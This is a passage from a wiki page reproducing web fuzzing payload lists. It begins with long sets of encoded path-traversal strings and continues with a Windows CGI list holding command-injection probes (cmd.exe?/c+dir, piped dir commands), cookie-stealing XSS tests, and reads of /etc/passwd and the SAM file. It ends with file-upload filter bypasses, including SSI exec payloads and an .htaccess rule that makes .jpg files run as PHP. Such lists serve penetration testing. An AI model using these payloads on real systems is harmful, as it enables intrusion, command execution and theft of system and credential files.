..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI   (Update: 17 March 2010)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass   (Update: 17 March 2009 s ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename &amp;lt;pre&amp;gt;Appends  (Update: 17 March 2009  ===&lt;br /&gt;
# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
